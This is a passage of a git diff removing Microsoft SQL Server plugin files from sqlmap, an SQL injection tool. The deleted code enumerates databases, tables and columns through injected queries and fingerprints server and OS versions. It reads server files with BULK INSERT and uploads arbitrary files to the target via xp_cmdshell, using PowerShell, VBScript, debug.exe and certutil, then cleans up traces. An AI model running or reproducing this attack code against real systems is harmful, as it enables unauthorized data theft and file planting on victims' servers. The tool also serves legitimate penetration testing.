if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - for db in dbs: - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) - - continue - - for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): - query = query.replace("%s", db) - value = inject.getValue(query, blind=False, time=False) - if not isNoneValue(value): - break - - if not isNoneValue(value): - value = filter(None, arrayizeValue(value)) - value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value] - kb.data.cachedTables[db] = value - - if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: - for db in dbs: - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) - - continue - - infoMsg = "fetching number of tables for " - infoMsg += "database '%s'" % db - logger.info(infoMsg) - - for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): - _ = query.replace("%s", db) - count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - if not isNoneValue(count): - break - - if not isNumPosStrValue(count): - if count != 0: - warnMsg = "unable to retrieve the number of " - warnMsg += "tables for database '%s'" % db - logger.warn(warnMsg) - continue - - tables = [] - - for index in xrange(int(count)): - _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index) - - table = inject.getValue(_, union=False, error=False) - if not isNoneValue(table): - kb.hintValue = table - table = safeSQLIdentificatorNaming(table, True) - tables.append(table) - - if tables: - kb.data.cachedTables[db] = tables - else: - warnMsg = "unable to retrieve the tables " - warnMsg += "for database '%s'" % db - logger.warn(warnMsg) - - if not kb.data.cachedTables and not conf.search: - errMsg = "unable to retrieve the tables for any database" - raise SqlmapNoneDataException(errMsg) - else: - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - return kb.data.cachedTables - - def searchTable(self): - foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table - tblCond = rootQuery.inband.condition - tblConsider, tblCondParam = self.likeOrExact("table") - - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") - elif not len(kb.data.cachedDbs): - enumDbs = self.getDbs() - else: - enumDbs = kb.data.cachedDbs - - for db in enumDbs: - db = safeSQLIdentificatorNaming(db) - foundTbls[db] = [] - - for tbl in tblList: - tbl = safeSQLIdentificatorNaming(tbl, True) - - infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) - - for db in foundTbls.keys(): - db = safeSQLIdentificatorNaming(db) - - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) - - continue - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query.replace("%s", db) - query += tblQuery - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - if isinstance(values, basestring): - values = [values] - - for foundTbl in values: - if foundTbl is None: - continue - - foundTbls[db].append(foundTbl) - else: - infoMsg = "fetching number of table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count - query = query.replace("%s", db) - query += " AND %s" % tblQuery - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query.replace("%s", db) - query += " AND %s" % tblQuery - query = agent.limitQuery(index, query, tblCond) - tbl = inject.getValue(query, union=False, error=False) - kb.hintValue = tbl - foundTbls[db].append(tbl) - - for db, tbls in foundTbls.items(): - if len(tbls) == 0: - foundTbls.pop(db) - - if not foundTbls: - warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) - return - - conf.dumper.dbTables(foundTbls) - self.dumpFoundTables(foundTbls) - - def searchColumn(self): - rootQuery = queries[Backend.getIdentifiedDbms()].search_column - foundCols = {} - dbs = {} - whereTblsQuery = "" - infoMsgTbl = "" - infoMsgDb = "" - colList = conf.col.split(",") - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - origTbl = conf.tbl - origDb = conf.db - colCond = rootQuery.inband.condition - tblCond = rootQuery.inband.condition2 - colConsider, colCondParam = self.likeOrExact("column") - - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") - elif not len(kb.data.cachedDbs): - enumDbs = self.getDbs() - else: - enumDbs = kb.data.cachedDbs - - for db in enumDbs: - db = safeSQLIdentificatorNaming(db) - dbs[db] = {} - - for column in colList: - column = safeSQLIdentificatorNaming(column) - conf.db = origDb - conf.tbl = origTbl - - infoMsg = "searching column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - - foundCols[column] = {} - - if conf.tbl: - _ = conf.tbl.split(",") - whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" - infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) - - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) - elif conf.excludeSysDbs: - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - infoMsgDb = " across all databases" - - logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) - - colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - - for db in filter(None, dbs.keys()): - db = safeSQLIdentificatorNaming(db) - - if conf.excludeSysDbs and db in self.excludeDbsList: - continue - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query % (db, db, db, db, db, db) - query += " AND %s" % colQuery.replace("[DB]", db) - query += whereTblsQuery.replace("[DB]", db) - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - if isinstance(values, basestring): - values = [values] - - for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) - - if foundTbl is None: - continue - - if foundTbl not in dbs[db]: - dbs[db][foundTbl] = {} - - if colConsider == "1": - conf.db = db - conf.tbl = foundTbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ - and not isNoneValue(kb.data.cachedColumns[db][foundTbl]): - dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) - kb.data.cachedColumns = {} - else: - dbs[db][foundTbl][column] = None - - if db in foundCols[column]: - foundCols[column][db].append(foundTbl) - else: - foundCols[column][db] = [foundTbl] - else: - foundCols[column][db] = [] - - infoMsg = "fetching number of tables containing column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (column, db) - logger.info("%s%s" % (infoMsg, infoMsgTbl)) - - query = rootQuery.blind.count - query = query % (db, db, db, db, db, db) - query += " AND %s" % colQuery.replace("[DB]", db) - query += whereTblsQuery.replace("[DB]", db) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no tables contain column" - if colConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % column - warnMsg += "in database '%s'" % db - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query % (db, db, db, db, db, db) - query += " AND %s" % colQuery.replace("[DB]", db) - query += whereTblsQuery.replace("[DB]", db) - query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) - tbl = inject.getValue(query, union=False, error=False) - kb.hintValue = tbl - - tbl = safeSQLIdentificatorNaming(tbl, True) - - if tbl not in dbs[db]: - dbs[db][tbl] = {} - - if colConsider == "1": - conf.db = db - conf.tbl = tbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: - dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) - kb.data.cachedColumns = {} - else: - dbs[db][tbl][column] = None - - foundCols[column][db].append(tbl) - - conf.dumper.dbColumns(foundCols, colConsider, dbs) - self.dumpFoundColumn(dbs, foundCols, colConsider) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py deleted file mode 100644 index 8ba15451..00000000 --- a/plugins/dbms/mssqlserver/filesystem.py +++ /dev/null @@ -1,409 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import ntpath -import os - -from lib.core.common import getLimitRange -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import posixToNtSlashes -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.convert import base64encode -from lib.core.convert import hexencode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject - -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def _dataToScr(self, fileContent, chunkName): - fileLines = [] - fileSize = len(fileContent) - lineAddr = 0x100 - lineLen = 20 - - fileLines.append("n %s" % chunkName) - fileLines.append("rcx") - fileLines.append("%x" % fileSize) - fileLines.append("f 0100 %x 00" % fileSize) - - for fileLine in xrange(0, len(fileContent), lineLen): - scrString = "" - - for lineChar in fileContent[fileLine:fileLine + lineLen]: - strLineChar = hexencode(lineChar) - - if not scrString: - scrString = "e %x %s" % (lineAddr, strLineChar) - else: - scrString += " %s" % strLineChar - - lineAddr += len(lineChar) - - fileLines.append(scrString) - - fileLines.append("w") - fileLines.append("q") - - return fileLines - - def _updateDestChunk(self, fileContent, tmpPath): - randScr = "tmpf%s.scr" % randomStr(lowercase=True) - chunkName = randomStr(lowercase=True) - fileScrLines = self._dataToScr(fileContent, chunkName) - - logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) - - self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) - - commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - return chunkName - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - result = [] - txtTbl = self.fileTblName - hexTbl = "%shex" % self.fileTblName - - self.createSupportTbl(txtTbl, self.tblField, "text") - inject.goStacked("DROP TABLE %s" % hexTbl) - inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) - - logger.debug("loading the content of file '%s' into support table" % rFile) - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True) - - # Reference: http://support.microsoft.com/kb/104829 - binToHexQuery = """DECLARE @charset VARCHAR(16) - DECLARE @counter INT - DECLARE @hexstr VARCHAR(4096) - DECLARE @length INT - DECLARE @chunk INT - - SET @charset = '0123456789ABCDEF' - SET @counter = 1 - SET @hexstr = '' - SET @length = (SELECT DATALENGTH(%s) FROM %s) - SET @chunk = 1024 - - WHILE (@counter <= @length) - BEGIN - DECLARE @tempint INT - DECLARE @firstint INT - DECLARE @secondint INT - - SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s)) - SET @firstint = floor(@tempint/16) - SET @secondint = @tempint - (@firstint * 16) - SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) - - SET @counter = @counter + 1 - - IF @counter %% @chunk = 0 - BEGIN - INSERT INTO %s(%s) VALUES(@hexstr) - SET @hexstr = '' - END - END - - IF @counter %% (@chunk) != 0 - BEGIN - INSERT INTO %s(%s) VALUES(@hexstr) - END - """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField) - - binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ") - inject.goStacked(binToHexQuery) - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False) - - if not result: - result = [] - count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - errMsg = "unable to retrieve the content of the " - errMsg += "file '%s'" % rFile - raise SqlmapNoneDataException(errMsg) - - indexRange = getLimitRange(count) - - for index in indexRange: - chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - result.append(chunk) - - inject.goStacked("DROP TABLE %s" % hexTbl) - - return result - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - errMsg = "Microsoft SQL Server does not support file upload with " - errMsg += "UNION query SQL injection technique" - raise SqlmapUnsupportedFeatureException(errMsg) - - def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): - infoMsg = "using PowerShell to write the %s file content " % fileType - infoMsg += "to file '%s'" % dFile - logger.info(infoMsg) - - encodedFileContent = base64encode(wFileContent) - encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) - encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) - - randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) - randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) - - wFileSize = len(encodedFileContent) - chunkMaxSize = 1024 - - logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) - - for i in xrange(0, wFileSize, chunkMaxSize): - wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] - self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) - - psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath - psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " - psString += "[System.Convert]::FromBase64String($Base64); Set-Content " - psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile - - logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) - self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) - - logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) - - commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, - "del /F /Q \"%s\"" % encodedBase64FilePath, - "del /F /Q \"%s\"" % randPSScriptPath) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): - infoMsg = "using debug.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." % dFile - logger.info(infoMsg) - - dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) - wFileSize = os.path.getsize(wFile) - debugSize = 0xFF00 - - if wFileSize < debugSize: - chunkName = self._updateDestChunk(wFileContent, tmpPath) - - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) - logger.debug(debugMsg) - - commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - else: - debugMsg = "the file is larger than %d bytes. " % debugSize - debugMsg += "sqlmap will split it into chunks locally, upload " - debugMsg += "it chunk by chunk and recreate the original file " - debugMsg += "on the server, please wait.." - logger.debug(debugMsg) - - for i in xrange(0, wFileSize, debugSize): - wFileChunk = wFileContent[i:i + debugSize] - chunkName = self._updateDestChunk(wFileChunk, tmpPath) - - if i == 0: - debugMsg = "renaming chunk " - copyCmd = "ren %s %s" % (chunkName, dFileName) - else: - debugMsg = "appending chunk " - copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) - - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) - logger.debug(debugMsg) - - commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) - - commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): - infoMsg = "using a custom visual basic script to write the " - infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) - logger.info(infoMsg) - - randVbs = "tmps%s.vbs" % randomStr(lowercase=True) - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - vbs = """Dim inputFilePath, outputFilePath - inputFilePath = "%s" - outputFilePath = "%s" - Set fs = CreateObject("Scripting.FileSystemObject") - Set file = fs.GetFile(inputFilePath) - If file.Size Then - Wscript.Echo "Loading from: " & inputFilePath - Wscript.Echo - Set fd = fs.OpenTextFile(inputFilePath, 1) - data = fd.ReadAll - fd.Close - data = Replace(data, " ", "") - data = Replace(data, vbCr, "") - data = Replace(data, vbLf, "") - Wscript.Echo "Fixed Input: " - Wscript.Echo data - Wscript.Echo - decodedData = base64_decode(data) - Wscript.Echo "Output: " - Wscript.Echo decodedData - Wscript.Echo - Wscript.Echo "Writing output in: " & outputFilePath - Wscript.Echo - Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) - ofs.Write decodedData - ofs.close - Else - Wscript.Echo "The file is empty." - End If - Function base64_decode(byVal strIn) - Dim w1, w2, w3, w4, n, strOut - For n = 1 To Len(strIn) Step 4 - w1 = mimedecode(Mid(strIn, n, 1)) - w2 = mimedecode(Mid(strIn, n + 1, 1)) - w3 = mimedecode(Mid(strIn, n + 2, 1)) - w4 = mimedecode(Mid(strIn, n + 3, 1)) - If Not w2 Then _ - strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) - If Not w3 Then _ - strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) - If Not w4 Then _ - strOut = strOut + Chr(((w3 * 64 + w4) And 255)) - Next - base64_decode = strOut - End Function - Function mimedecode(byVal strIn) - Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" - If Len(strIn) = 0 Then - mimedecode = -1 : Exit Function - Else - mimedecode = InStr(Base64Chars, strIn) - 1 - End If - End Function""" % (randFilePath, dFile) - - vbs = vbs.replace(" ", "") - encodedFileContent = base64encode(wFileContent) - - logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) - - self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) - - self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) - - commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, - "del /F /Q %s" % randVbs, - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): - infoMsg = "using certutil.exe to write the %s " % fileType - infoMsg += "file content to file '%s', please wait.." % dFile - logger.info(infoMsg) - - chunkMaxSize = 500 - - randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) - - encodedFileContent = base64encode(wFileContent) - - splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) - - logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) - - self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) - - logger.debug("decoding the file to %s.." % dFile) - - commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), - "del /F /Q %s" % randFile) - complComm = " & ".join(command for command in commands) - - self.execCmd(complComm) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - # NOTE: this is needed here because we use xp_cmdshell extended - # procedure to write a file on the back-end Microsoft SQL Server - # file system - self.initEnv() - - self.getRemoteTempPath() - - tmpPath = posixToNtSlashes(conf.tmpPath) - dFile = posixToNtSlashes(dFile) - with open(wFile, "rb") as f: - wFileContent = f.read() - - self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the custom Visual Basic script technique? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the built-in debug.exe technique? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - if written is False: - message = "do you want to try to upload the file with " - message += "the built-in certutil.exe technique? [Y/n] " - choice = readInput(message, default="Y") - - if not choice or choice.lower() == "y": - self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - return written diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py deleted file mode 100644 index 891f3f05..00000000 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import MSSQL_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.MSSQL) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None - - if release and version and servicepack: - banVer = "%s %s " % (DBMS.MSSQL, release) - banVer += "Service Pack %s " % servicepack - banVer += "version %s" % version - - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): - setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - - infoMsg = "testing %s" % DBMS.MSSQL - logger.info(infoMsg) - - # NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not - # work connecting directly to the Microsoft SQL Server database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])") - - if result: - infoMsg = "confirming %s" % DBMS.MSSQL - logger.info(infoMsg) - - for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ - ("2005", "XACT_STATE()=XACT_STATE()"), \ - ("2008", "SYSDATETIME()=SYSDATETIME()"), \ - ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")): - result = inject.checkBooleanExpression(check) - - if result: - Backend.setVersion(version) - - if Backend.getVersion(): - setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) - else: - setDbms(DBMS.MSSQL) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack(): - return - - if not Backend.getOs(): - Backend.setOs(OS.WINDOWS) - - if not detailed: - return - - infoMsg = "fingerprinting the back-end DBMS operating system " - infoMsg += "version and service pack" - logger.info(infoMsg) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") - inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - - # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions - # http://en.wikipedia.org/wiki/Windows_NT#Releases - versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), - "2000": ("5.0", (4, 3, 2, 1)), - "XP": ("5.1", (3, 2, 1)), - "2003": ("5.2", (2, 1)), - "Vista or 2008": ("6.0", (2, 1)), - "7 or 2008 R2": ("6.1", (1, 0)), - "8 or 2012": ("6.2", (0,)), - "8.1 or 2012 R2": ("6.3", (0,)) } - - # Get back-end DBMS underlying operating system version - for version, data in versions.items(): - query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Windows NT " + data[0] + "%')" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsVersion(version) - infoMsg += " %s" % Backend.getOsVersion() - break - - if not Backend.getOsVersion(): - Backend.setOsVersion("2003") - Backend.setOsServicePack(2) - - warnMsg = "unable to fingerprint the underlying operating " - warnMsg += "system version, assuming it is Windows " - warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack()) - logger.warn(warnMsg) - - self.cleanup(onlyFileTbl=True) - - return - - # Get back-end DBMS underlying operating system service pack - sps = versions[Backend.getOsVersion()][1] - for sp in sps: - query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) - query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsServicePack(sp) - break - - if not Backend.getOsServicePack(): - debugMsg = "assuming the operating system has no service pack" - logger.debug(debugMsg) - - Backend.setOsServicePack(0) - - if Backend.getOsVersion(): - infoMsg += " Service Pack %d" % Backend.getOsServicePack() - - logger.info(infoMsg) - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py deleted file mode 100644 index bfb02676..00000000 --- a/plugins/dbms/mssqlserver/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 